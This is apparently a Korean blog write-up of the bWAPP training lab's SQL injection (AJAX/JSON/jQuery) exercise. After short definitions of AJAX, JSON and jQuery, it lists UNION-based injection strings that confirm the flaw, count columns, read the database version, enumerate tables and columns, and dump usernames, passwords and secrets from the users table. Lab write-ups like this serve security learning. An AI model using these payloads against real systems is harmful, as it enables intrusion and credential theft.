bWAPP 16. SQL Injection (AJAX JSON jQuery)

                                           SQL Injection (AJAX JSON jQuery)

 

AJAX(Asynchronous javaScript and XML)는 HTML, 자바스크립트, JSON을 혼합하여 사용하는 기술을 말한다.

JSON(JavaScript Object Notation)은 웹 서버와 데이터를 주고 받을 때 데이터를 표현하는 방법을 뜻하는데,

자바스크립트 형식으로 객체를 표현한다.

JQuery는 자바스크립트 라이브러리 중 하나로, 클라이언트에서 스크립트 언어를 사용할 때 이를 단순화하고

AJAX 기능도 제공 한다.

 

밑 블로그의 정의를 참고했다.

출처: https://lucete1230-cyberpolice.tistory.com/90 [I-Tstory]

 

아무 글자를 입력하더라도 결과가 출력되는 것을 확인할 수 있다.

 

 

[ 공격 가능 확인 ]

입력 값 : ' or 1=1#

 

 

 

 

[ 컬럼 수 확인 ]

입력 값 : 0' union select all 1,2,3,4,5,6,7#

 

 

 

 

 

[ 버전 확인 ]

입력 값 : 0' union select all 1,@@version,database(),4,5,6,7#

 

 

 

 

 

[ 테이블 명 확인하기 ]

입력 값 :  0' UNION SELECT ALL 1, table_name,3,4,5,6,7 from information_schema.tables#

 

 

 

 

 

 

[ user 테이블 컬럼 명 추출 ]

입력 값 :  ' UNION SELECT ALL 1,column_name,3,4,5,6,7 from information_schema.columns where table_name='users'#

 

 

 

 

 

[ user 테이블의 컬럼 내용 확인 ]

입력 값 :  0' union select all 1, concat(id,login),password,email,secret,6,7 from users#